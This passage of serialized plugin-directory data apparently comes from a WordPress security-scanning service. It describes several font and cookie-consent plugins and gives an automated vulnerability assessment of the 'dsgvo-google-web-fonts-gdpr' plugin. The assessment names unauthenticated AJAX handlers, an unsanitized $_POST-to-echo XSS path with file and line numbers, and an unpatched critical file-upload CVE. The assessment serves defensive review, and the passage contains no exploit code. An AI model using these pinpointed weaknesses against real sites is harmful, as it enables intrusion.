href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Fplugin\u002Fyabe-webfont\u002Freviews\u002F?filter=5\u002F#new-post\" rel=\"ugc\">WordPress\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Credits\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>Image by \u003Ca href=\"https:\u002F\u002Fwww.flaticon.com\u002Ffree-icon\u002Fwindmill_5137991?related_id=5137991\" rel=\"nofollow ugc\">Freepik\u003C\u002Fa> on Flaticon\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FuMj0x0ucnOw?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\n\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FA0JZzEVIUzQ?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\n","Easy self-host Google Fonts, Adobe Fonts support, or upload custom fonts in WordPress. Integrated into the most popular themes and page builders.",5000,28430,25,"2026-03-17T15:14:00.000Z","6.0","7.4",[117,118,19,20,21],"adobe-fonts","custom-fonts","https:\u002F\u002Fwebfont.yabe.land","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fyabe-webfont.1.0.100.zip",{"slug":122,"name":123,"version":124,"author":125,"author_profile":126,"description":127,"short_description":128,"active_installs":80,"downloaded":129,"rating":80,"num_ratings":80,"last_updated":130,"tested_up_to":73,"requires_at_least":131,"requires_php":115,"tags":132,"homepage":135,"download_link":136,"security_score":13,"vuln_count":80,"unpatched_count":80,"last_vuln_date":35,"fetched_at":81},"gdpr-localizer","GDPR Localizer – Smart Google Fonts Local Hosting & DSGVO Compliance","1.1.3","vpuida","https:\u002F\u002Fprofiles.wordpress.org\u002Fvpuida\u002F","\u003Cp>Most GDPR font plugins do one thing: download fonts once. \u003Cstrong>GDPR Localizer\u003C\u002Fstrong> goes further. It automatically detects when you update or switch your theme and alerts you instantly — so you always know when to refresh your font cache. It also localizes Gravatars, eliminating the last hidden IP leak most plugins ignore. Set it once, stay in control.\u003C\u002Fp>\n\u003Ch4>Why choose GDPR Localizer?\u003C\u002Fh4>\n\u003Cp>Unlike basic solutions, this plugin is designed to be truly “set and forget.” It doesn’t just download fonts; it monitors your site’s environment. If you update your theme version or switch to a new one, the plugin detects the change and prompts you to refresh the font cache to ensure your design stays perfect, fast, and compliant.\u003C\u002Fp>\n\u003Ch4>Key Features\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Automatic Interception:\u003C\u002Fstrong> Seamlessly handles fonts enqueued by themes and plugins.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Smart Theme Tracking:\u003C\u002Fstrong> Detects theme updates and notifies you to manually refresh the font cache to prevent conflicts with caching plugins.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Privacy First:\u003C\u002Fstrong> Stops user IP addresses from being shared with Google CDN.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Performance Boost:\u003C\u002Fstrong> Serving fonts locally eliminates external DNS lookups and SSL handshakes.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Transparent Audit:\u003C\u002Fstrong> An intuitive admin dashboard shows you exactly which fonts were captured and their source (e.g., \u003Ccode>astra-google-fonts\u003C\u002Fcode>).\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Clean UI:\u003C\u002Fstrong> Interactive font logs with “Expand\u002FCollapse” functionality to keep your settings page tidy.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Local Gravatars:\u003C\u002Fstrong> Automatically downloads and serves user avatars from your server to prevent IP tracking by Gravatar.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Smart Onboarding & Preview:\u003C\u002Fstrong> Professional dashboard with real-time detection logs and visual previews of localized fonts.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Deep Interception:\u003C\u002Fstrong> Advanced support for Elementor and themes with complex CSS loading.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Privacy Hardening:\u003C\u002Fstrong> Automatically strips redundant preconnect and dns-prefetch tags pointing to Google or Gravatar.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Deutsche Beschreibung (DSGVO)\u003C\u002Fh3>\n\u003Cp>Die meisten GDPR-Font-Plugins laden Schriftarten nur einmal herunter. \u003Cstrong>GDPR Localizer\u003C\u002Fstrong> geht weiter: Es erkennt automatisch, wenn Sie Ihr Theme aktualisieren oder wechseln, und benachrichtigt Sie sofort – so wissen Sie immer, wann Sie den Schrift-Cache erneuern müssen. Zudem lokalisiert es Gravatar-Avatare und schließt damit das letzte versteckte IP-Leck. Einmal einrichten, volle Kontrolle behalten.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Hauptmerkmale:\u003C\u002Fstrong>\u003Cbr \u002F>\n* \u003Cstrong>Automatische Erkennung:\u003C\u002Fstrong> Verarbeitet nahtlos Schriften, die von Themes und Plugins in die Warteschlange gestellt werden.\u003Cbr \u002F>\n* \u003Cstrong>Smart Theme Tracking:\u003C\u002Fstrong> Erkennt Theme-Updates und weist Sie darauf hin, den Schrift-Cache manuell zu aktualisieren, um Konflikte mit Caching-Plugins zu vermeiden.\u003Cbr \u002F>\n* \u003Cstrong>DSGVO-Konformität:\u003C\u002Fstrong> Verhindert die Weitergabe von Nutzer-IP-Adressen an Google CDN.\u003Cbr \u002F>\n* \u003Cstrong>Performance-Schub:\u003C\u002Fstrong> Lokales Laden von Schriften verbessert die Ladezeit durch Wegfall externer DNS-Abfragen.\u003Cbr \u002F>\n* \u003Cstrong>Transparentes Audit:\u003C\u002Fstrong> Ein intuitives Dashboard zeigt genau an, welche Schriftarten erfasst wurden.\u003Cbr \u002F>\n* \u003Cstrong>Lokale Gravatare:\u003C\u002Fstrong> Lädt Benutzer-Avatare automatisch herunter und stellt sie von Ihrem Server bereit, um IP-Tracking durch Gravatar zu verhindern.\u003Cbr \u002F>\n* \u003Cstrong>Intelligentes Onboarding & Vorschau:\u003C\u002Fstrong> Professionelles Dashboard mit Echtzeit-Protokollen und visueller Vorschau lokalisierter Schriftarten.\u003Cbr \u002F>\n* \u003Cstrong>Tiefe Interzeption:\u003C\u002Fstrong> Erweiterte Unterstützung für Elementor und Themes mit komplexem CSS-Laden.\u003Cbr \u002F>\n* \u003Cstrong>Privacy Hardening:\u003C\u002Fstrong> Entfernt automatisch überflüssige Preconnect- und DNS-Prefetch-Tags zu Google- oder Gravatar-Servern.\u003C\u002Fp>\n\u003Cp>Gefällt Ihnen GDPR Localizer? Bitte unterstützen Sie uns mit einer 5-Sterne-Bewertung!\u003C\u002Fp>\n\u003Ch3>External services\u003C\u002Fh3>\n\u003Cp>This plugin connects to Google Fonts services to localized your website’s typography and ensure GDPR compliance.\u003C\u002Fp>\n\u003Col>\n\u003Cli>\u003Cstrong>Google Fonts API (fonts.googleapis.com):\u003C\u002Fstrong> Used to fetch the CSS rules for the fonts enqueued by your theme or plugins.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Google Fonts Static (fonts.gstatic.com):\u003C\u002Fstrong> Used to download the actual font files (.woff2, .ttf, etc.) to your local server.\u003C\u002Fli>\n\u003C\u002Fol>\n\u003Cp>This process happens only when a new font is detected or when the font cache is refreshed (e.g., after a theme update). Once the fonts are stored locally, no further requests are made to Google.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>Google Fonts Privacy FAQ:\u003C\u002Fstrong> https:\u002F\u002Fdevelopers.google.com\u002Ffonts\u002Ffaq\u002Fprivacy\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Google Privacy Policy:\u003C\u002Fstrong> https:\u002F\u002Fpolicies.google.com\u002Fprivacy\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Google Terms of Service:\u003C\u002Fstrong> https:\u002F\u002Fpolicies.google.com\u002Fterms\u003C\u002Fli>\n\u003C\u002Ful>\n","Automatically localizes Google Fonts to comply with GDPR\u002FDSGVO requirements by hosting them on your own server. Set it and forget it.",227,"2026-04-12T12:58:00.000Z","5.8",[19,133,20,21,134],"font-optimization","local-fonts","https:\u002F\u002Faltaev.com\u002Fgdpr-localizer","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgdpr-localizer.1.1.3.zip",{"slug":138,"name":139,"version":140,"author":141,"author_profile":142,"description":143,"short_description":144,"active_installs":145,"downloaded":146,"rating":147,"num_ratings":148,"last_updated":149,"tested_up_to":73,"requires_at_least":150,"requires_php":151,"tags":152,"homepage":156,"download_link":157,"security_score":158,"vuln_count":159,"unpatched_count":80,"last_vuln_date":160,"fetched_at":81},"gdpr-cookie-compliance","GDPR Cookie Compliance – Cookie Banner, Cookie Consent, Cookie Notice for CCPA, EU Cookie Law","5.0.11","Moove Agency","https:\u002F\u002Fprofiles.wordpress.org\u002Fmooveagency\u002F","\u003Cp>\u003Cstrong>Prepare your website for cookie consent requirements related to GDPR, CCPA, DSGVO, EU cookie law and notice requirements with this incredibly powerful, easy-to-use, well supported and 100% free WordPress plugin.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Ch3>Key Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Local Data Storage\u003C\u002Fstrong> – all user data is stored locally on your website only – we do not collect or store any of your user data on our servers\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Simple\u003C\u002Fstrong> to use — install & setup in seconds\u003C\u002Fli>\n\u003Cli>Give your users \u003Cstrong>full control\u003C\u002Fstrong> over cookies stored on their computer, including the ability for users to \u003Cstrong>revoke their consent\u003C\u002Fstrong>.\u003C\u002Fli>\n\u003Cli>Direct integration of \u003Cstrong>GTM, Google Analytics, Meta Pixel, GTM4WP\u003C\u002Fstrong> and more\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Google Consent Mode v2\u003C\u002Fstrong> fully supported\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Fully customisable\u003C\u002Fstrong> – upload your own logo, colours, fonts\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Fully editable\u003C\u002Fstrong> – change all text\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Flexible\u003C\u002Fstrong> – decide which scripts will be loaded by default or only when the user gives consent\u003C\u002Fli>\n\u003Cli>\u003Cstrong>‘Accept’\u003C\u002Fstrong>, \u003Cstrong>‘Reject’\u003C\u002Fstrong>, ‘Close’ and ‘Settings’ buttons & you can also change their order\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Consent expiration\u003C\u002Fstrong> settings\u003C\u002Fli>\n\u003Cli>Link to \u003Cstrong>Privacy Policy\u003C\u002Fstrong> page\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Mobile responsive\u003C\u002Fstrong> design\u003C\u002Fli>\n\u003Cli>\u003Cstrong>SEO friendly\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>Optimized for \u003Cstrong>WCAG & ADA\u003C\u002Fstrong> accessibility guidelines\u003C\u002Fli>\n\u003Cli>WPML, QTranslate, WP Multilang, TranslatePress and Polylang compatible, .pot file for translations included\u003C\u002Fli>\n\u003Cli>Supports all major \u003Cstrong>caching\u003C\u002Fstrong> servers and plugins\u003C\u002Fli>\n\u003Cli>Available in \u003Cstrong>22 languages\u003C\u002Fstrong>\u003C\u002Fli>\n\u003Cli>Optimised for PHP 7 and PHP 8\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Premium Features Available\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>Consent Log\u003C\u002Fstrong> – stores user consent information to prove that consent was given\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Geo-location\u003C\u002Fstrong> – the Cookie Consent Banner can be shown to visitors from the European Union or selected countries only (ie. Canada, California etc.)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Google Site Kit integration\u003C\u002Fstrong> – our plugin supports the Google Site Kit natively\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Cookie wall \u002F Full-screen layout\u003C\u002Fstrong> – if enabled, the Cookie Consent Banner will be display in a full screen mode, and force users to either accept or reject cookies before they can see your content\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Export & import settings\u003C\u002Fstrong> – transfer your custom settings between sites with ease\u003C\u002Fli>\n\u003Cli>\u003Cstrong>WordPress Multisite features\u003C\u002Fstrong> – you can manage the plugin settings globally, and clone them from one site to another within your multi-site setup. You can also sync users consent between individual subsites on your multisite network\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Accept on Scroll \u002F Hide timer\u003C\u002Fstrong> – allow users to accept cookies by scrolling down the page OR by setting a timer (ie. Hide banner after 5 seconds)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Renew Consent\u003C\u002Fstrong> – ask users to renew their consent if there is a change in privacy or cookie policy on your site\u003C\u002Fli>\n\u003Cli>\u003Cstrong>iFrame Blocker\u003C\u002Fstrong> – blocks users from viewing 3rd party resources (such as Youtube) until they accept cookies\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Language Specific Scripts\u003C\u002Fstrong> – insert different Tag Manager Scripts for different languages, supports WPML and other language plugins\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Premium Shortcodes\u003C\u002Fstrong> that can be added to your ‘Privacy & Cookie Policy’ and allow your users to manage their consent with ease.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Hide Cookie Banner\u003C\u002Fstrong> allows you to hide the Cookie Notice Banner on selected pages\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Cookie Declaration\u003C\u002Fstrong> allows you to declare the exact type of cookies that your site uses, including the cookie name, provider, purpose and expiration\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Analytics\u003C\u002Fstrong> – stats and charts showing you how many users accepted your cookies (all anonymous)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Fast Premium Support\u003C\u002Fstrong> from our friendly team\u003C\u002Fli>\n\u003Cli>\u003Cstrong>12 months\u003C\u002Fstrong> of premium updates included\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwww.mooveagency.com\u002Fwordpress-plugins\u002Fgdpr-cookie-compliance\u002F\" rel=\"nofollow ugc\">Download Premium Add-on here\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Demo Video\u003C\u002Fh3>\n\u003Cp>You can view a demo of the plugin here:\u003C\u002Fp>\n\u003Cdiv class=\"embed-vimeo\" style=\"text-align: center;\">\u003Ciframe loading=\"lazy\" src=\"https:\u002F\u002Fplayer.vimeo.com\u002Fvideo\u002F255655268\" width=\"750\" height=\"422\" frameborder=\"0\" webkitallowfullscreen mozallowfullscreen allowfullscreen>\u003C\u002Fiframe>\u003C\u002Fdiv>\n\u003Ch3>Testimonials\u003C\u002Fh3>\n\u003Cp>★★★★★\u003C\u002Fp>\n\u003Cblockquote>\n\u003Cp>“The only free GDPR plugin that actually works.” – \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Ftopic\u002Fthe-only-free-gdpr-plugin-that-actually-works\u002F\" rel=\"ugc\">Jamie\u003C\u002Fa>\u003C\u002Fp>\n\u003C\u002Fblockquote>\n\u003Cp>★★★★★\u003C\u002Fp>\n\u003Cblockquote>\n\u003Cp>“One of the best GDPR implementation for WordPress.” – \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Ftopic\u002Fone-of-the-best-gdpr-implementation-for-wordpress\u002F\" rel=\"ugc\">webinvaders\u003C\u002Fa>\u003C\u002Fp>\n\u003C\u002Fblockquote>\n\u003Cp>★★★★★\u003C\u002Fp>\n\u003Cblockquote>\n\u003Cp>“The best free solution for GDPR.” – \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Ftopic\u002Fthe-best-free-solution-for-the-gdpr\u002F\" rel=\"ugc\">Distrix\u003C\u002Fa>\u003C\u002Fp>\n\u003C\u002Fblockquote>\n\u003Cp>★★★★★\u003C\u002Fp>\n\u003Cblockquote>\n\u003Cp>“Great plugin, great support. I’ve tried many, this is probably the best for multisite installations.” – \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Ftopic\u002Fgreat-plugin-great-support-1157\u002F\" rel=\"ugc\">pattihis\u003C\u002Fa>\u003C\u002Fp>\n\u003C\u002Fblockquote>\n\u003Ch3>Live Examples\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>You can choose to setup our cookie plugin in any way that you like. \u003C\u002Fli>\n\u003Cli>We have created the plugin with as much flexibility as possible as organisations interpret the Cookie Law and Cookie Consent Policy differently.\u003C\u002Fli>\n\u003Cli>A few examples of how you can setup our plugin in various ways are below:\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>OPTION A\u003C\u002Fstrong>\u003Cbr \u002F>\nNo cookies are stored on users’ computers until the user accepts cookies.\u003Cbr \u002F>\n\u003Ca href=\"https:\u002F\u002Fwww.mooveagency.com\u002Fwordpress-plugins\u002Fgdpr-cookie-compliance\u002F\" rel=\"nofollow ugc\">Example 1\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Cstrong>OPTION B\u003C\u002Fstrong>\u003Cbr \u002F>\nThe ‘Full-Screen \u002F Cookie Wall’ option is used (a premium feature).\u003Cbr \u002F>\n\u003Ca href=\"https:\u002F\u002Fwww.teneo.net\u002F\" rel=\"nofollow ugc\">Example 2\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Cstrong>OTHER OPTIONS\u003C\u002Fstrong>\u003Cbr \u002F>\nThere are many other settings available that you can use to create your own unique Cookie Consent Banner and satisfy the Cookie Compliance Law – our plugin is very flexible.\u003C\u002Fp>\n\u003Ch3>Custom Layout\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>You can also create your own custom front-end layout.\u003C\u002Fli>\n\u003Cli>Simply copy the “gdpr-modules” folder from the plugin directory to your theme directory. \u003C\u002Fli>\n\u003Cli>If you do this, your changes will be retained even if you update the plugin in future. \u003C\u002Fli>\n\u003Cli>Any customisation should be implemented by experienced developers only.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>Flexible\u003C\u002Fh3>\n\u003Cp>Our cookie plugin is very flexible and especially useful in preparing your site for the following cookie law, data protection and privacy regulations:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>GDPR\u003C\u002Fstrong>: The General Data Protection Regulation, ePrivacy Directive, ePrivacy Regulation (European Union)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>CCPA\u003C\u002Fstrong>: The California Consumer Privacy Act (California, United States)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>PECR\u003C\u002Fstrong>: The Privacy and Electronic Communications Regulations (UK)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>AAP\u003C\u002Fstrong>: Australia’s Privacy Principles (Australia)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>PIPEDA\u003C\u002Fstrong>: The Personal Information Protection and Electronic Documents Act (Canada) \u003C\u002Fli>\n\u003Cli>\u003Cstrong>LGPD\u003C\u002Fstrong>: The Brazilian General Data Protection Law (Brazil)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>VCDPA, CPRA, ICO, GPDP, DSGVO, BfDl, CNIL, AEPD, PDPB, DPA, PDPA, DPA, PDPA, TTDSG, POPIA , APA, ePrivacy, COPPA, CASL, Australian Privacy Principles, The Marco Civil Privacy Act 1988\u003C\u002Fstrong> and other cookie law, data protection and privacy regulations\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>About us\u003C\u002Fh3>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwww.mooveagency.com\u002F\" rel=\"nofollow ugc\">Moove Agency\u003C\u002Fa> is a premium supplier of quality WordPress plugins, services and support. \u003Ca href=\"https:\u002F\u002Fwww.mooveagency.com\u002Fwordpress-plugins\u002F\" rel=\"nofollow ugc\">Visit our WordPress site\u003C\u002Fa> to learn more.\u003C\u002Fp>\n\u003Ch3>Disclaimer\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>THIS PLUGIN DOES NOT MAKE YOUR WEBSITE COMPLIANT. YOU ARE RESPONSIBLE FOR ENSURING THAT ALL COOKIE LAW REQUIREMENTS ARE MET ON YOUR WEBSITE.\u003C\u002Fli>\n\u003C\u002Ful>\n","Cookie notice banner for GDPR, CCPA, EU cookie law, data protection and privacy regulations and other cookie law and consent notice requirements on yo &hellip;",300000,12266494,92,204,"2026-02-02T13:03:00.000Z","4.5","6.4",[153,154,155,19,20],"ccpa","cookie-banner","cookie-consent","https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fgdpr-cookie-compliance\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgdpr-cookie-compliance.5.0.11.zip",97,9,"2025-02-23 00:00:00",{"attackSurface":162,"codeSignals":189,"taintFlows":226,"riskAssessment":264,"analyzedAt":280},{"hooks":163,"ajaxHandlers":180,"restRoutes":186,"shortcodes":187,"cronEvents":188,"entryPointCount":14,"unprotectedCount":14},[164,170,172,176,178],{"type":165,"name":166,"callback":167,"file":168,"line":169},"action","admin_menu","anonymous","dsgvo-google-web-fonts-gdpr.php",38,{"type":165,"name":171,"callback":167,"file":168,"line":93},"admin_enqueue_scripts",{"type":165,"name":173,"callback":167,"priority":174,"file":168,"line":175},"wp_enqueue_scripts",999,277,{"type":165,"name":173,"callback":167,"priority":25,"file":168,"line":177},279,{"type":165,"name":171,"callback":167,"priority":25,"file":168,"line":179},283,[181,184],{"action":182,"nopriv":46,"callback":167,"hasNonce":46,"hasCapCheck":46,"file":168,"line":183},"DSGVOGWPdownloadGoogleFonts",44,{"action":182,"nopriv":185,"callback":167,"hasNonce":46,"hasCapCheck":46,"file":168,"line":71},true,[],[],[],{"dangerousFunctions":190,"sqlUsage":191,"outputEscaping":193,"fileOperations":224,"externalRequests":14,"nonceChecks":25,"capabilityChecks":80,"bundledLibraries":225},[],{"prepared":80,"raw":80,"locations":192},[],{"escaped":194,"rawEcho":195,"locations":196},4,13,[197,201,203,205,207,209,210,212,214,216,218,220,222],{"file":198,"line":199,"context":200},"core\u002Finc\u002Fbackend.php",66,"raw output",{"file":198,"line":202,"context":200},68,{"file":198,"line":204,"context":200},72,{"file":198,"line":206,"context":200},161,{"file":198,"line":208,"context":200},190,{"file":198,"line":208,"context":200},{"file":198,"line":211,"context":200},206,{"file":198,"line":213,"context":200},274,{"file":198,"line":215,"context":200},276,{"file":198,"line":217,"context":200},306,{"file":168,"line":219,"context":200},101,{"file":168,"line":221,"context":200},134,{"file":168,"line":223,"context":200},158,12,[],[227,244,256],{"entryPoint":228,"graph":229,"unsanitizedCount":25,"severity":243},"DSGVOGWPdownloadGoogleFonts (dsgvo-google-web-fonts-gdpr.php:58)",{"nodes":230,"edges":241},[231,236],{"id":232,"type":233,"label":234,"file":168,"line":235},"n0","source","$_POST",70,{"id":237,"type":238,"label":239,"file":168,"line":219,"wp_function":240},"n1","sink","echo() [XSS]","echo",[242],{"from":232,"to":237,"sanitized":46},"medium",{"entryPoint":245,"graph":246,"unsanitizedCount":80,"severity":255},"\u003Cbackend> (core\u002Finc\u002Fbackend.php:0)",{"nodes":247,"edges":253},[248,250],{"id":232,"type":233,"label":249,"file":198,"line":11},"$_POST['use_googlewebfonts']",{"id":237,"type":238,"label":251,"file":198,"line":11,"wp_function":252},"update_option() [Settings Manipulation]","update_option",[254],{"from":232,"to":237,"sanitized":185},"low",{"entryPoint":257,"graph":258,"unsanitizedCount":25,"severity":255},"\u003Cdsgvo-google-web-fonts-gdpr> (dsgvo-google-web-fonts-gdpr.php:0)",{"nodes":259,"edges":262},[260,261],{"id":232,"type":233,"label":234,"file":168,"line":235},{"id":237,"type":238,"label":239,"file":168,"line":219,"wp_function":240},[263],{"from":232,"to":237,"sanitized":46},{"summary":265,"deductions":266},"The \"dsgvo-google-web-fonts-gdpr\" plugin v1.1 exhibits several concerning security weaknesses. While it demonstrates good practices in its handling of SQL queries, the presence of two AJAX handlers without authentication checks significantly expands the attack surface and creates readily accessible entry points for malicious actors. The taint analysis revealing flows with unsanitized paths further exacerbates this issue, suggesting potential for unexpected behavior or exploitation if these paths are manipulated.\n\nThe plugin's vulnerability history is a major red flag, with a known critical CVE that remains unpatched. The previous critical vulnerability was related to unrestricted file uploads, which is a severe issue that could lead to code execution. The fact that a critical vulnerability is still present indicates a lack of ongoing security diligence and patching processes.\n\nIn conclusion, despite the plugin's positive use of prepared statements for SQL, the critical unpatched vulnerability, unprotected AJAX endpoints, and potential taint flow issues paint a picture of a high-risk plugin. The consistent pattern of critical vulnerabilities suggests a fundamental flaw in the plugin's development and maintenance, making it a significant security concern.",[267,270,273,275,278],{"reason":268,"points":269},"Unpatched critical CVE",20,{"reason":271,"points":272},"AJAX handlers without auth checks",10,{"reason":274,"points":272},"Flows with unsanitized paths",{"reason":276,"points":277},"Low output escaping coverage",5,{"reason":279,"points":277},"No capability checks","2026-04-16T11:17:36.908Z",{"wat":282,"direct":288},{"assetPaths":283,"generatorPatterns":285,"scriptPaths":286,"versionParams":287},[284],"\u002Fwp-content\u002Fplugins\u002Fdsgvo-google-web-fonts-gdpr\u002Fcore\u002Fassets\u002Fcss\u002Fadmin-style.css",[],[],[],{"cssClasses":289,"htmlComments":291,"htmlAttributes":292,"restEndpoints":294,"jsGlobals":295,"shortcodeOutput":296},[290],"gfontsdnldsts",[],[293],"content_url()",[],[],[],{"error":185,"url":298,"statusCode":299,"statusMessage":300,"message":300},"http:\u002F\u002Flocalhost\u002Fapi\u002Fplugins\u002Fdsgvo-google-web-fonts-gdpr\u002Fbundle",404,"no bundle for this plugin yet",{"slug":4,"current_version":6,"total_versions":14,"versions":302},[303,309],{"version":6,"download_url":23,"svn_tag_url":304,"released_at":35,"has_diff":46,"diff_files_changed":305,"diff_lines":35,"trac_diff_url":306,"vulnerabilities":307,"is_current":185},"https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdsgvo-google-web-fonts-gdpr\u002Ftags\u002F1.1\u002F",[],"https:\u002F\u002Fplugins.trac.wordpress.org\u002Fchangeset?old_path=%2Fdsgvo-google-web-fonts-gdpr%2Ftags%2F1.0&new_path=%2Fdsgvo-google-web-fonts-gdpr%2Ftags%2F1.1",[308],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35},{"version":310,"download_url":311,"svn_tag_url":312,"released_at":35,"has_diff":46,"diff_files_changed":313,"diff_lines":35,"trac_diff_url":35,"vulnerabilities":314,"is_current":46},"1.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdsgvo-google-web-fonts-gdpr.1.0.zip","https:\u002F\u002Fplugins.svn.wordpress.org\u002Fdsgvo-google-web-fonts-gdpr\u002Ftags\u002F1.0\u002F",[],[315],{"id":31,"url_slug":32,"title":33,"severity":37,"cvss_score":38,"vuln_type":40,"patched_in_version":35}]